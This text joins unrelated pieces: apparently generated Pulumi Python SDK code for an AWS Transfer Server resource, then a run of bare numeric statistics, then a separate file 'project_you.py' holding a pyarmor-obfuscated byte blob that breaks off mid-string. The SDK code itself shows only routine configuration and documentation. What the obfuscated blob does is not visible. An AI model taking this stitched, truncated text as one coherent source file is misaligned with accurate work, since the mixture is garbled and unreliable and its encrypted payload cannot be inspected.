tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
url: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a AWS Transfer Server resource.
> **NOTE on AWS IAM permissions:** If the `endpoint_type` is set to `VPC`, the `ec2:DescribeVpcEndpoints` and `ec2:ModifyVpcEndpoint` [actions](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonec2.html#amazonec2-actions-as-permissions) are used.
## Example Usage
### Basic
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example", tags={
"Name": "Example",
})
```
### Security Policy Name
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example", security_policy_name="TransferSecurityPolicy-2020-06")
```
### VPC Endpoint
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example",
endpoint_type="VPC",
endpoint_details=aws.transfer.ServerEndpointDetailsArgs(
address_allocation_ids=[aws_eip["example"]["id"]],
subnet_ids=[aws_subnet["example"]["id"]],
vpc_id=aws_vpc["example"]["id"],
))
```
### AWS Directory authentication
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example",
identity_provider_type="AWS_DIRECTORY_SERVICE",
directory_id=aws_directory_service_directory["example"]["id"])
```
### AWS Lambda authentication
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example",
identity_provider_type="AWS_LAMBDA",
function=aws_lambda_identity_provider["example"]["arn"])
```
### Protocols
```python
import pulumi
import pulumi_aws as aws
example = aws.transfer.Server("example",
endpoint_type="VPC",
endpoint_details=aws.transfer.ServerEndpointDetailsArgs(
subnet_ids=[aws_subnet["example"]["id"]],
vpc_id=aws_vpc["example"]["id"],
),
protocols=[
"FTP",
"FTPS",
],
certificate=aws_acm_certificate["example"]["arn"],
identity_provider_type="API_GATEWAY",
url=f"{aws_api_gateway_deployment['example']['invoke_url']}{aws_api_gateway_resource['example']['path']}")
```
## Import
Transfer Servers can be imported using the `server id`, e.g.,
```sh
$ pulumi import aws:transfer/server:Server example s-12345678
```
Certain resource arguments, such as `host_key`, cannot be read via the API and imported into the provider. This provider will display a difference for these arguments the first run after import if declared in the provider configuration for an imported resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] certificate: The Amazon Resource Name (ARN) of the AWS Certificate Manager (ACM) certificate. This is required when `protocols` is set to `FTPS`
:param pulumi.Input[str] directory_id: The directory service ID of the directory service you want to connect to with an `identity_provider_type` of `AWS_DIRECTORY_SERVICE`.
:param pulumi.Input[str] domain: The domain of the storage system that is used for file transfers. Valid values are: `S3` and `EFS`. The default value is `S3`.
:param pulumi.Input[pulumi.InputType['ServerEndpointDetailsArgs']] endpoint_details: The virtual private cloud (VPC) endpoint settings that you want to configure for your SFTP server. Fields documented below.
:param pulumi.Input[str] endpoint_type: The type of endpoint that you want your SFTP server connect to. If you connect to a `VPC` (or `VPC_ENDPOINT`), your SFTP server isn't accessible over the public internet. If you want to connect your SFTP server via public internet, set `PUBLIC`. Defaults to `PUBLIC`.
:param pulumi.Input[bool] force_destroy: A boolean that indicates all users associated with the server should be deleted so that the Server can be destroyed without error. The default value is `false`. This option only applies to servers configured with a `SERVICE_MANAGED` `identity_provider_type`.
:param pulumi.Input[str] function: The ARN for a lambda function to use for the Identity provider.
:param pulumi.Input[str] host_key: RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command).
:param pulumi.Input[str] identity_provider_type: The mode of authentication enabled for this service. The default value is `SERVICE_MANAGED`, which allows you to store and access SFTP user credentials within the service. `API_GATEWAY` indicates that user authentication requires a call to an API Gateway endpoint URL provided by you to integrate an identity provider of your choice. Using `AWS_DIRECTORY_SERVICE` will allow for authentication against AWS Managed Active Directory or Microsoft Active Directory in your on-premises environment, or in AWS using AD Connectors. Use the `AWS_LAMBDA` value to directly use a Lambda function as your identity provider. If you choose this value, you must specify the ARN for the lambda function in the `function` argument.
:param pulumi.Input[str] invocation_role: Amazon Resource Name (ARN) of the IAM role used to authenticate the user account with an `identity_provider_type` of `API_GATEWAY`.
:param pulumi.Input[str] logging_role: Amazon Resource Name (ARN) of an IAM role that allows the service to write your SFTP users’ activity to your Amazon CloudWatch logs for monitoring and auditing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] protocols: Specifies the file transfer protocol or protocols over which your file transfer protocol client can connect to your server's endpoint. This defaults to `SFTP` . The available protocols are:
* `SFTP`: File transfer over SSH
* `FTPS`: File transfer with TLS encryption
* `FTP`: Unencrypted file transfer
:param pulumi.Input[str] security_policy_name: Specifies the name of the security policy that is attached to the server. Possible values are `TransferSecurityPolicy-2018-11`, `TransferSecurityPolicy-2020-06`, and `TransferSecurityPolicy-FIPS-2020-06`. Default value is: `TransferSecurityPolicy-2018-11`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[str] url: - URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`.
"""
...
@overload
def __init__(__self__,
             resource_name: str,
             args: Optional[ServerArgs] = None,
             opts: Optional[pulumi.ResourceOptions] = None):
    """
    Provides a AWS Transfer Server resource.

    > **NOTE on AWS IAM permissions:** If the `endpoint_type` is set to `VPC`, the
    `ec2:DescribeVpcEndpoints` and `ec2:ModifyVpcEndpoint`
    [actions](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonec2.html#amazonec2-actions-as-permissions)
    are used.

    Supports `SERVICE_MANAGED`, `API_GATEWAY`, `AWS_DIRECTORY_SERVICE` and
    `AWS_LAMBDA` identity providers, VPC endpoints, and the `SFTP`/`FTPS`/`FTP`
    protocols (see the resource argument docs for full examples).

    ## Import

    Transfer Servers can be imported using the `server id`, e.g.,

    ```sh
    $ pulumi import aws:transfer/server:Server example s-12345678
    ```

    Certain resource arguments, such as `host_key`, cannot be read via the API and
    imported into the provider. This provider will display a difference for these
    arguments the first run after import if declared in the provider configuration
    for an imported resource.

    :param str resource_name: The name of the resource.
    :param ServerArgs args: The arguments to use to populate this resource's properties.
    :param pulumi.ResourceOptions opts: Options for the resource.
    """
    ...
def __init__(__self__, resource_name: str, *args, **kwargs):
    # Dispatch between the two overloads: either a single ServerArgs object or
    # plain keyword arguments were supplied by the caller.
    parsed_args, parsed_opts = _utilities.get_resource_args_opts(ServerArgs, pulumi.ResourceOptions, *args, **kwargs)
    if parsed_args is None:
        # Keyword-argument form: forward everything untouched.
        __self__._internal_init(resource_name, *args, **kwargs)
    else:
        # Args-object form: expand its fields into keyword arguments.
        __self__._internal_init(resource_name, parsed_opts, **parsed_args.__dict__)
def _internal_init(__self__,
                   resource_name: str,
                   opts: Optional[pulumi.ResourceOptions] = None,
                   certificate: Optional[pulumi.Input[str]] = None,
                   directory_id: Optional[pulumi.Input[str]] = None,
                   domain: Optional[pulumi.Input[str]] = None,
                   endpoint_details: Optional[pulumi.Input[pulumi.InputType['ServerEndpointDetailsArgs']]] = None,
                   endpoint_type: Optional[pulumi.Input[str]] = None,
                   force_destroy: Optional[pulumi.Input[bool]] = None,
                   function: Optional[pulumi.Input[str]] = None,
                   host_key: Optional[pulumi.Input[str]] = None,
                   identity_provider_type: Optional[pulumi.Input[str]] = None,
                   invocation_role: Optional[pulumi.Input[str]] = None,
                   logging_role: Optional[pulumi.Input[str]] = None,
                   protocols: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                   security_policy_name: Optional[pulumi.Input[str]] = None,
                   tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                   url: Optional[pulumi.Input[str]] = None,
                   __props__=None):
    # Real constructor shared by both __init__ overloads: validates options,
    # builds the ServerArgs property bag and registers the resource.
    if opts is None:
        opts = pulumi.ResourceOptions()
    if not isinstance(opts, pulumi.ResourceOptions):
        raise TypeError('Expected resource options to be a ResourceOptions instance')
    if opts.version is None:
        opts.version = _utilities.get_version()
    if opts.id is None:
        if __props__ is not None:
            raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
        __props__ = ServerArgs.__new__(ServerArgs)
        # User-supplied input properties.
        for prop_name, prop_value in (
                ("certificate", certificate),
                ("directory_id", directory_id),
                ("domain", domain),
                ("endpoint_details", endpoint_details),
                ("endpoint_type", endpoint_type),
                ("force_destroy", force_destroy),
                ("function", function),
                ("host_key", host_key),
                ("identity_provider_type", identity_provider_type),
                ("invocation_role", invocation_role),
                ("logging_role", logging_role),
                ("protocols", protocols),
                ("security_policy_name", security_policy_name),
                ("tags", tags),
                ("url", url)):
            __props__.__dict__[prop_name] = prop_value
        # Output-only properties are unknown until the provider resolves them.
        for output_prop in ("arn", "endpoint", "host_key_fingerprint", "tags_all"):
            __props__.__dict__[output_prop] = None
    super(Server, __self__).__init__(
        'aws:transfer/server:Server',
        resource_name,
        __props__,
        opts)
@staticmethod
def get(resource_name: str,
        id: pulumi.Input[str],
        opts: Optional[pulumi.ResourceOptions] = None,
        arn: Optional[pulumi.Input[str]] = None,
        certificate: Optional[pulumi.Input[str]] = None,
        directory_id: Optional[pulumi.Input[str]] = None,
        domain: Optional[pulumi.Input[str]] = None,
        endpoint: Optional[pulumi.Input[str]] = None,
        endpoint_details: Optional[pulumi.Input[pulumi.InputType['ServerEndpointDetailsArgs']]] = None,
        endpoint_type: Optional[pulumi.Input[str]] = None,
        force_destroy: Optional[pulumi.Input[bool]] = None,
        function: Optional[pulumi.Input[str]] = None,
        host_key: Optional[pulumi.Input[str]] = None,
        host_key_fingerprint: Optional[pulumi.Input[str]] = None,
        identity_provider_type: Optional[pulumi.Input[str]] = None,
        invocation_role: Optional[pulumi.Input[str]] = None,
        logging_role: Optional[pulumi.Input[str]] = None,
        protocols: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
        security_policy_name: Optional[pulumi.Input[str]] = None,
        tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
        tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
        url: Optional[pulumi.Input[str]] = None) -> 'Server':
    """
    Get an existing Server resource's state with the given name, id, and optional extra
    properties used to qualify the lookup.

    :param str resource_name: The unique name of the resulting resource.
    :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] arn: Amazon Resource Name (ARN) of Transfer Server
    :param pulumi.Input[str] certificate: ACM certificate ARN; required when `protocols` includes `FTPS`.
    :param pulumi.Input[str] directory_id: Directory service ID used with `identity_provider_type` of `AWS_DIRECTORY_SERVICE`.
    :param pulumi.Input[str] domain: Storage domain for file transfers: `S3` (default) or `EFS`.
    :param pulumi.Input[str] endpoint: Endpoint of the Transfer Server (e.g., `s-12345678.server.transfer.REGION.amazonaws.com`)
    :param pulumi.Input[pulumi.InputType['ServerEndpointDetailsArgs']] endpoint_details: VPC endpoint settings for the SFTP server.
    :param pulumi.Input[str] endpoint_type: Endpoint type: `PUBLIC` (default), `VPC` or `VPC_ENDPOINT`.
    :param pulumi.Input[bool] force_destroy: Delete all associated users so the server can be destroyed without error. Defaults to `false`; only applies with a `SERVICE_MANAGED` `identity_provider_type`.
    :param pulumi.Input[str] function: ARN of the Lambda function used as the identity provider.
    :param pulumi.Input[str] host_key: RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command).
    :param pulumi.Input[str] host_key_fingerprint: MD5 hash of the server's host key, equivalent to `ssh-keygen -l -E md5 -f my-new-server-key` output.
    :param pulumi.Input[str] identity_provider_type: Authentication mode: `SERVICE_MANAGED` (default), `API_GATEWAY`, `AWS_DIRECTORY_SERVICE`, or `AWS_LAMBDA` (the latter requires `function`).
    :param pulumi.Input[str] invocation_role: IAM role ARN used to authenticate with an `identity_provider_type` of `API_GATEWAY`.
    :param pulumi.Input[str] logging_role: IAM role ARN that allows writing SFTP user activity to CloudWatch logs.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] protocols: File transfer protocols enabled on the endpoint (`SFTP` by default, plus `FTPS`/`FTP`).
    :param pulumi.Input[str] security_policy_name: Security policy attached to the server; defaults to `TransferSecurityPolicy-2018-11`.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.
    :param pulumi.Input[str] url: URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`.
    """
    opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
    __props__ = _ServerState.__new__(_ServerState)
    # Copy every piece of looked-up state into the private property bag.
    state = (
        ("arn", arn),
        ("certificate", certificate),
        ("directory_id", directory_id),
        ("domain", domain),
        ("endpoint", endpoint),
        ("endpoint_details", endpoint_details),
        ("endpoint_type", endpoint_type),
        ("force_destroy", force_destroy),
        ("function", function),
        ("host_key", host_key),
        ("host_key_fingerprint", host_key_fingerprint),
        ("identity_provider_type", identity_provider_type),
        ("invocation_role", invocation_role),
        ("logging_role", logging_role),
        ("protocols", protocols),
        ("security_policy_name", security_policy_name),
        ("tags", tags),
        ("tags_all", tags_all),
        ("url", url),
    )
    for state_name, state_value in state:
        __props__.__dict__[state_name] = state_value
    return Server(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
    """Amazon Resource Name (ARN) of Transfer Server."""
    return pulumi.get(self, "arn")
@property
@pulumi.getter
def certificate(self) -> pulumi.Output[Optional[str]]:
    """ACM certificate ARN; required when `protocols` is set to `FTPS`."""
    return pulumi.get(self, "certificate")
@property
@pulumi.getter(name="directoryId")
def directory_id(self) -> pulumi.Output[Optional[str]]:
    """Directory service ID used with an `identity_provider_type` of `AWS_DIRECTORY_SERVICE`."""
    return pulumi.get(self, "directory_id")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[Optional[str]]:
    """Storage domain used for file transfers: `S3` (the default) or `EFS`."""
    return pulumi.get(self, "domain")
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[str]:
    """Endpoint of the Transfer Server (e.g., `s-12345678.server.transfer.REGION.amazonaws.com`)."""
    return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="endpointDetails")
def endpoint_details(self) -> pulumi.Output[Optional['outputs.ServerEndpointDetails']]:
    """Virtual private cloud (VPC) endpoint settings configured for the SFTP server."""
    return pulumi.get(self, "endpoint_details")
@property
@pulumi.getter(name="endpointType")
def endpoint_type(self) -> pulumi.Output[Optional[str]]:
    """Endpoint type: `PUBLIC` (the default, internet-accessible), `VPC`, or `VPC_ENDPOINT`."""
    return pulumi.get(self, "endpoint_type")
@property
@pulumi.getter(name="forceDestroy")
def force_destroy(self) -> pulumi.Output[Optional[bool]]:
    """Whether all associated users are deleted so the server can be destroyed without error. Defaults to `false`; only applies to `SERVICE_MANAGED` servers."""
    return pulumi.get(self, "force_destroy")
@property
@pulumi.getter
def function(self) -> pulumi.Output[Optional[str]]:
    """ARN of the Lambda function used as the identity provider."""
    return pulumi.get(self, "function")
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> pulumi.Output[Optional[str]]:
    """RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command)."""
    return pulumi.get(self, "host_key")
@property
@pulumi.getter(name="hostKeyFingerprint")
def host_key_fingerprint(self) -> pulumi.Output[str]:
    """MD5 hash of the server's host key, equivalent to the output of `ssh-keygen -l -E md5 -f my-new-server-key`."""
    return pulumi.get(self, "host_key_fingerprint")
@property
@pulumi.getter(name="identityProviderType")
def identity_provider_type(self) -> pulumi.Output[Optional[str]]:
    """Authentication mode: `SERVICE_MANAGED` (the default, credentials stored in the service), `API_GATEWAY` (custom endpoint URL), `AWS_DIRECTORY_SERVICE` (managed/on-premises Active Directory), or `AWS_LAMBDA` (requires the `function` argument)."""
    return pulumi.get(self, "identity_provider_type")
@property
@pulumi.getter(name="invocationRole")
def invocation_role(self) -> pulumi.Output[Optional[str]]:
    """IAM role ARN used to authenticate the user account with an `identity_provider_type` of `API_GATEWAY`."""
    return pulumi.get(self, "invocation_role")
@property
@pulumi.getter(name="loggingRole")
def logging_role(self) -> pulumi.Output[Optional[str]]:
    """IAM role ARN that allows the service to write SFTP users' activity to CloudWatch logs for monitoring and auditing."""
    return pulumi.get(self, "logging_role")
@property
@pulumi.getter
def protocols(self) -> pulumi.Output[Sequence[str]]:
    """File transfer protocols enabled on the server's endpoint. Defaults to `SFTP`; available values are `SFTP` (over SSH), `FTPS` (with TLS encryption), and `FTP` (unencrypted)."""
    return pulumi.get(self, "protocols")
@property
@pulumi.getter(name="securityPolicyName")
def security_policy_name(self) -> pulumi.Output[Optional[str]]:
    """Security policy attached to the server: `TransferSecurityPolicy-2018-11` (default), `TransferSecurityPolicy-2020-06`, or `TransferSecurityPolicy-FIPS-2020-06`."""
    return pulumi.get(self, "security_policy_name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
    """Map of tags assigned to the resource; keys matching the provider `default_tags` block overwrite the provider-level values."""
    return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
    """Map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block."""
    return pulumi.get(self, "tags_all")
@property
@pulumi.getter
def url(self) -> pulumi.Output[Optional[str]]:
    """URL of the service endpoint used to authenticate users with an `identity_provider_type` of `API_GATEWAY`."""
    return pulumi.get(self, "url")
| 56.604672
| 772
| 0.67837
| 7,999
| 63,001
| 5.189649
| 0.04388
| 0.067571
| 0.065764
| 0.058826
| 0.954519
| 0.947509
| 0.935609
| 0.929779
| 0.927852
| 0.91641
| 0
| 0.005309
| 0.225679
| 63,001
| 1,112
| 773
| 56.655576
| 0.845643
| 0.513024
| 0
| 0.83452
| 1
| 0
| 0.096505
| 0.017401
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16726
| false
| 0.001779
| 0.012456
| 0
| 0.281139
| 0.02669
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4a32df01424bf6a52065b09ddeaffc87b09f9a20
| 8,671
|
py
|
Python
|
project intro app/dist/project_you.py
|
shivansh4123/youtube
|
a5849cda67cfa9f28187f683442f8db25c42c1c5
|
[
"Unlicense"
] | null | null | null |
project intro app/dist/project_you.py
|
shivansh4123/youtube
|
a5849cda67cfa9f28187f683442f8db25c42c1c5
|
[
"Unlicense"
] | null | null | null |
project intro app/dist/project_you.py
|
shivansh4123/youtube
|
a5849cda67cfa9f28187f683442f8db25c42c1c5
|
[
"Unlicense"
] | null | null | null |
from pytransform import pyarmor_runtime
pyarmor_runtime()
__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x0a\x00\x6f\x0d\x0d\x0a\x09\x2f\xa0\x01\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x1f\x08\x00\x00\x00\x00\x00\x08\x6a\xbc\x04\xbc\xda\x41\xd3\xfe\x30\x7f\x70\x02\xb1\x58\xc8\x2b\x00\x00\x00\x00\x00\x00\x00\x00\xc4\xa8\xb3\xe7\x3b\x67\x33\x9c\x03\x4d\x0d\x66\x1a\x56\x3c\xe9\xac\x0c\x29\x45\xc2\x8b\x94\x34\xe8\x0f\xaf\xfc\xae\x11\xe7\xe9\x80\xd1\x3f\x63\xbf\x6f\x0e\xe6\xd1\x87\xa5\x68\xd0\x9f\x01\x80\x44\x4e\x49\x45\xc8\x49\x39\x8c\xf8\x25\xe3\x88\x33\x05\xd6\xfd\xe0\x4e\x62\xc5\xd3\xbc\x68\x82\x8b\xd8\x18\x19\x09\x01\x49\x84\x31\x6e\x37\x7c\xf3\x96\x8f\xf3\xf8\x5b\xab\x52\xd5\x4b\xf9\xa4\x63\xea\x52\x43\x9c\x55\x42\xe7\x17\xf4\xfd\x70\xd7\x20\x53\x1a\x8c\xb9\x03\x2b\x5a\xa8\x3c\x75\x18\x89\xff\xd7\x8b\xef\x81\x23\x1d\x7c\x5a\xec\x15\x89\x67\xd5\x55\x74\x71\xd6\x18\xea\xd5\x2c\x65\xea\x47\x05\xe8\x27\x49\x4b\x7e\x35\x0f\x30\x6a\x47\xc2\x7b\x09\xef\xae\x4d\x58\xcd\xff\x35\x0d\xf7\xb3\x71\x00\xad\x40\xa5\xc4\x5e\x2c\xdd\xa8\x7d\x50\xaa\xdd\x8d\xf6\xd5\x69\xfc\x80\x87\x03\x1a\xa4\x9b\x13\xa6\x0c\x52\x4a\xe6\x0c\xa2\x84\xe4\xaf\xea\x9a\x29\x8f\xb6\x47\xba\xa1\x76\x08\x24\x41\x13\x17\x93\xe4\xd9\x7d\xf9\x65\xb6\xdd\x86\x57\x1f\x2b\xf0\x19\xa8\xc4\xab\x32\x4d\x1b\x4f\x3a\x89\xb1\xa1\x08\xc9\xe7\xd1\x39\x3c\xe9\xb8\x8d\x76\x07\x5d\xc0\x5f\x8a\x2f\xd5\xc9\x45\xf2\xc5\x8c\x75\x4c\x95\x8f\xe2\x46\xec\xb8\x7b\x24\xa8\x9a\x54\xd2\xab\x8c\xd1\x6d\x7e\x2f\x56\x83\x69\x5c\xde\xab\x13\xdc\x05\xbe\xbd\x5b\x8b\x32\xe6\xd2\xad\x60\xd7\xe9\xb9\xe2\x3c\xa7\x1e\xaa\x0c\x42\xf3\x6b\x4b\x46\x34\x4e\xa8\x88\x0a\x2a\x3a\xbd\x13\x6a\xa4\xa8\x80\x82\x47\x76\xf0\xa4\x3f\x57\x37\xd8\x02\xc7\xb5\x89\x13\xf6\x0f\x55\xa3\xb4\x3a\x31\x62\x63\xf8\x49\xb5\x6c\x72\x5f\x27\x87\x85\x21\x46\x0e\xe5\xaa\x3c\x9d\x4d\x22\x10\x77\x48\xec\x5e\x26\xb2\xb9\x51\xfe\x45\x1c\x50\xde\xb8\x7c\xa4\xc8\xde\x13\xf8\x6a\x17\xd7\x7c\x39\x44\x9d\xe3\xec\x98\xe6\xa9\x25\x9a\x44\x96\xd7\x21\x4f\x8d\xfc\xc4\xc4\xa1\xb5\x01\x6b\x44\xc4\x0d\x8a\x05\x
91\x37\xa0\x4b\x51\xb8\xea\x65\x59\xc9\x1c\x2a\xb0\xaf\x3b\xe5\x2a\xb3\x4b\x5b\xd5\x11\xb0\x9f\xf6\x6b\x8c\xed\x06\x7b\xe7\x8d\x88\xa4\x93\x14\xe9\x4d\x12\x84\x61\x95\x8f\x24\xff\xfc\xec\x6d\x26\xe2\x10\x26\xb0\x4d\xab\x23\xc2\x95\x6a\xac\xf4\xe9\x16\xfe\x2f\x05\xcd\xb7\x30\x0f\xed\x4a\xf5\x1c\x62\x3a\xbd\xc2\x9d\xac\xb1\xaf\xa5\x60\xe7\xa2\x23\xd6\x10\xd2\x30\x59\xf2\x4f\xa8\xb6\xfd\x02\xd9\x7a\xc3\x98\x84\xfb\xbb\x63\x1c\x8d\x51\x61\x77\xfb\x73\x05\xff\xbd\x6c\x49\xd8\xde\x51\x02\xaf\xee\xcb\xbd\xea\xbb\xfc\x96\x03\x91\x3f\xb7\x07\x04\x7b\x83\xea\x78\x87\xe1\xe5\xa4\x2e\xe5\x85\x94\xe6\x6e\x61\xb7\x4e\xa1\x5c\xe2\x62\x12\x0f\xd1\x49\xff\x19\xe9\x96\xdb\xb1\x2c\x32\x48\xee\xa6\x61\x1c\xd0\x2d\x68\x66\x80\x4a\xf5\x87\x6a\x62\x1e\xc3\xe2\x04\xb8\x9d\x29\x61\x90\xff\xf6\x9d\xd3\x9a\xf5\x9c\xce\x9d\xcf\x8e\xb4\xd7\x6f\x44\xc2\x95\x2f\x20\x07\x70\x4c\x18\x6e\xa2\x0e\x6e\xb5\x5a\x50\x28\x3b\xb4\x3f\x92\x2d\xde\x4f\xaa\x58\x57\x74\x53\xaf\x00\x39\x51\xbb\xc5\x20\xff\x9c\x62\xb5\x9d\x36\x13\xac\x26\x36\xeb\x77\xd1\xc3\xa2\xd5\x85\xd7\xd3\xf9\x5c\x85\x1e\x8e\x25\x70\x37\x6d\x65\x2c\x75\x29\x4b\x1a\x1a\xe7\x12\x4e\x67\x23\xe0\xe2\x50\xb5\x86\x52\x91\x8a\x97\x79\x95\xdb\x28\x0f\xad\x49\xe6\x50\x60\x4f\xad\x1e\xdd\x71\x8b\x8f\x32\xd7\x91\x96\x03\x9e\xec\xe6\xd5\x56\x1f\x67\xc8\x1b\x0c\x28\x4b\x96\xef\x48\x04\xf9\x0f\x73\x25\x8a\x08\xc1\x71\xde\xa8\x85\xf6\xd8\xb8\xa4\xdf\x56\xf2\xe8\xb0\x32\xbd\xfb\x02\x82\x79\x00\x07\x94\x8a\xcb\x3d\x54\x19\x75\x38\xb1\x27\xe6\xc5\xea\xf5\xce\xee\x6d\xf3\x3f\x76\xc7\xd1\xff\xf8\xa4\xe0\x2e\xcc\x8d\x39\x5c\xab\xe7\xe9\x39\x55\x34\x30\xed\x51\xa1\x87\xd8\xca\x98\xca\xa4\xd8\x15\x04\x0a\x2b\x5b\x23\xc3\xe0\xb8\x5a\x7f\x9c\x90\x97\xf4\x1d\xb4\xfb\x24\xaa\x65\x92\x31\xd7\x2e\x36\x32\x40\x60\x2e\xbc\xd8\x4a\xe7\x55\xdd\xcc\x80\x0c\x21\x64\xa8\x6a\xfc\x68\x13\xc0\xa5\x1f\xd9\x25\xf9\x0a\x6e\xa6\x91\x19\xc1\x29\xea\xbe\xeb\x48\xb1\x8f\x42\xf0\x78\xba\x1c\x45\x7c\x9a\x8f\x41\x31\x55\x89\x15\x5d\xd5\xac\x37\xb0\x3a\xb9\xf4\x5d\x99\x80\x8e\x4b\xfa\xce\x
35\xff\x51\x9f\x56\x57\x5f\x07\xdc\x93\x17\xb9\xdc\xb6\x4b\x33\x9d\x4c\xa2\xcc\x34\x22\x78\x1b\x32\x9b\xc0\x4f\x9f\xa1\x61\xe0\x10\xb6\xb3\xfe\x54\x9e\xc2\xd2\xa0\x44\x83\x7b\xab\x91\x6c\xdd\xba\x32\x53\x4a\x9a\x14\xde\xa8\xfe\x39\x96\xd8\x51\x03\x6f\x5e\xe6\x3f\xf5\x36\x12\x01\x5f\xdc\x78\x71\x73\x14\xbf\x84\xbb\x16\xfb\xd6\x07\x35\xc2\x2a\xac\xe2\xa9\xc5\x1e\xf3\xd6\x8e\x7b\x86\xed\x8f\xcc\x15\x90\x08\x42\x0b\xab\x16\xaf\x1d\x02\x86\xbe\x75\x3a\xf4\x15\xc1\x29\xcd\xba\x05\x43\x24\x36\x4b\x9f\x95\x28\x13\x86\x91\xca\x56\x8d\x80\x73\xc5\xa8\x5e\x63\xe4\x57\x33\x8f\x1e\xf1\x74\x02\x93\x55\xf9\x60\xab\x4a\xb9\x8e\xf1\x45\x26\x0b\x67\xdd\x2f\x11\xb7\x51\x46\xff\x90\xea\x5a\xba\x02\x66\x1c\x0b\xc5\xd9\xc0\x61\x92\x63\x94\xcd\x15\x08\x55\x40\xb3\x81\xcf\x4c\x16\x19\x20\xcc\x13\x22\x31\x20\xe6\xed\xea\xe7\x3b\x92\xdf\xcc\x36\xdd\xac\x9d\x29\x37\x68\xe4\x76\xcf\x26\x85\xb4\xb1\x15\x28\xa2\x23\x01\xe9\x78\xd6\xda\xbe\x8f\x10\xea\xf2\x62\xb7\x0b\xce\x6b\xbb\x34\xd1\x9a\x3d\x6b\xad\x73\xc1\x73\x86\x17\xb6\x26\xbe\x0c\x27\x1a\x91\xa5\xb5\xf0\x20\xf8\x76\xc6\xc7\x2d\x21\x80\x47\x94\x2a\xc2\x88\x71\x1b\x36\x2d\x76\x15\xde\x8d\x2c\x0e\x08\x51\x8d\x2c\x20\xc4\x65\x05\x37\x86\x22\x3b\x98\x57\xfd\xe2\x37\x26\x9f\x69\x37\x6c\xac\x3c\x48\xf2\x2d\x83\x1a\x3f\x72\xe4\x45\x5d\xe2\x97\x5d\xb4\x42\x79\x0d\xa2\x85\xd0\x55\x08\xf3\x6a\xd0\xb8\xac\x83\x0d\x30\x4c\x15\xea\x7b\x67\x85\xbf\xe2\x90\x8d\xf0\x10\x58\x4e\x99\xc5\xfb\x2f\x4d\x4a\x41\x83\x3f\xe3\xdf\x93\x85\xd6\x2f\x40\x3d\x6d\xb6\x32\x2b\x45\xc6\x37\x6a\x77\x60\xaa\xaf\x87\x84\xfd\x7c\x50\x97\xf0\x86\xbf\x39\x21\xc7\x94\x4f\x28\xd3\xe6\xf0\xb8\x1e\xe9\xc5\x9e\xc3\x39\x7c\xb3\x4d\x24\x6e\x99\x77\xbc\xf1\x69\x48\xe9\x3a\xba\xfa\x62\x69\xca\xbe\x09\x63\x8c\x9f\xc5\xff\xed\xfc\xc8\x95\x91\x4f\x8c\xbc\xe2\x7c\xd5\x3f\xa0\xc6\x2c\x80\x0f\x65\x95\x7e\xd9\x03\x82\xa9\xb1\x29\xf9\xb8\x5c\x26\xcb\x04\x6b\x2c\x3f\xdc\xec\xfa\xb0\x24\xf5\xef\xb5\x95\x6a\xf0\xeb\xf0\xc8\x95\x34\xd4\x4a\x9f\xde\xc4\x25\x7e\xd6\x16\xb1\xf1\x10\xd6\x19\x8a\x29\x83\x
